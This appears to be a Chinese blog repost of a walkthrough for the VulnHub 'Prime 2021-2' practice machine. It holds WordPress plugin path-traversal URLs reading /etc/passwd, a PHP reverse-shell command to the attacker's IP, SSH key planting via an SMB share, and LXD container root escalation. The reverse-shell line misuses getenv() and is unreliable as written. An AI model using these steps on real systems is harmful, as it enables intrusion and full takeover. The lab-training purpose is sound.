環境
Kali: 192.168.132.131
靶機:192.168.132.147 靶機地址:http://www.vulnhub.com/entry/prime-2021-2,696/
一、資訊收集
nmap -sP 192.168.132.0/24

nmap -p- -sC -sV 192.168.132.147

檢查 smb 共享檔案夾
smbclient -L 192.168.132.147

進入smb 共享檔案夾,找到shell.php
smbclient [//192.168.132.147/welcome](//192.168.132.147/welcome)

下載查看

發現用戶名

gobuster dir -u [http://192.168.132.147](http://192.168.132.147) -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -b 400,403,404,500 -t 100 -x .php,.html,.txt,.bak,.zip

二、漏洞探測
檢查 wordpress 的漏洞,發現 1 個用戶和 1 個易受攻擊的插件,
wpscan --url [http://192.168.132.147/wp/](http://192.168.132.147/wp/) -e u,ap

該插件存在檔案包含漏洞

查看漏洞說明

三、漏洞驗證
進行驗證
curl '[http://192.168.132.147/wp/wp-content/plugins/gracemedia-media-player/templates/files/ajax_controller.php?ajaxAction=getIds&cfg=../../../../../../../../../../etc/passwd](http://192.168.132.147/wp/wp-content/plugins/gracemedia-media-player/templates/files/ajax_controller.php?ajaxAction=getIds&cfg=../../../../../../../../../../etc/passwd)'

curl '[http://192.168.132.147/wp/wp-content/plugins/gracemedia-media-player/templates/files/ajax_controller.php?ajaxAction=getIds&cfg=../../../../../../../../../../home/jarves/upload/shell.php&cmd=id](http://192.168.132.147/wp/wp-content/plugins/gracemedia-media-player/templates/files/ajax_controller.php?ajaxAction=getIds&cfg=../../../../../../../../../../home/jarves/upload/shell.php&cmd=id)'

http://192.168.132.147:10123/
存在目錄遍歷漏洞,存在一句話木馬,可以進行嘗試進行文本包含漏洞執行腳本進行反彈shell

利用漏洞
php -r '$sock=fsockopen(getenv("192.168.132.131"),getenv("4444"));exec("/bin/sh -i <&3 >&3 2>&3");'
http://192.168.132.147:10123/upload/shell.php?cmd=php%20-r%20'%24sock%3dfsockopen(getenv(%22192.168.132.131%22)%2cgetenv(%224444%22))%3bexec(%22%2fbin%2fsh%20-i%20%3c%263%20%3e%263%202%3e%263%22)%3b'
開啟監聽埠,接收反彈shell

發現用戶jarves的家為smb共享檔案,進行上傳rsa密鑰,進而免密碼進行ssh登錄到jarves
在攻擊機中生成rsa的公鑰和私鑰

將公鑰id_rsa.pub追加到authorized_keys中,并驗證兩者內容是否一致
cat id_rsa.pub >> authorized_keys

進入smb共享檔案夾,并創建.ssh檔案,將authorized_keys檔案上傳到.ssh檔案夾內
smbclient //192.168.132.147/welcome


攻擊機的使用ssh免密進行登錄,驗證當前用戶

四、提權
獲得jarves用戶權限,驗證用戶jarves是LXD組的成員,接下來使用lxd漏洞進行提權
git clone https://github.com/saghul/lxd-alpine-builder.git
cd lxd-alpine-builder
./build-alpine

在攻擊機上開啟臨時http服務

使靶機訪問并下載
lxd init
lxc image import ./alpine-v3.13-x86_64-20210608_1525.tar.gz --alias myimage

lxc image list

lxd init alpine:v3.12 mypool
lxc init myimage ignite -c security.privileged=true
lxc config device add ignite mydevice disk source=/ path=/mnt/root recursive=true
lxc start ignite | lxc exec ignite /bin/sh
獲得root權限

將authorized_keys檔案上傳到root/.ssh檔案中實作遠程ssh免密登錄
進入/mnt/root內,這個目錄包含所有宿主機檔案

進入root/.ssh目錄中,將靶機中authorized_keys檔案洗掉,將攻擊機中的authorized_keys檔案下載到.ssh檔案夾

chmod 600 authorized_keys

攻擊機的使用ssh免密進行登錄,驗證當前用戶root

五、總結
使用nmap掃描埠,檢查smb共享檔案夾,發現獲得shell的腳本和用戶名,使用gobuster目錄掃描,發現目錄wp特征為CMS框架,使用wpscan工具掃描該CMS框架,發現gracemdia-media-player插件,使用searchsploit工具搜索該插件的漏洞,存在檔案包含漏洞,與該網站10123埠下腳本組合利用,反彈shell,發現用戶jarves的家為smb共享檔案,通過smb共享檔案夾上傳攻擊機的公鑰,進而免密碼進行ssh登錄到jarves,獲得jarves用戶權限,驗證用戶jarves是LXD組的成員,接下來使用lxd漏洞進行提權,獲得root權限,
注:LXD是一個root行程,它可以負責執行任意用戶的LXD UNIX套接字寫入訪問操作,而且在某些情況下,LXD甚至都不會對呼叫它的用戶權限進行檢查和匹配,
轉載請註明出處,本文鏈接:https://www.uj5u.com/qita/302661.html
標籤:其他
上一篇:APT攻擊之郵件偽造
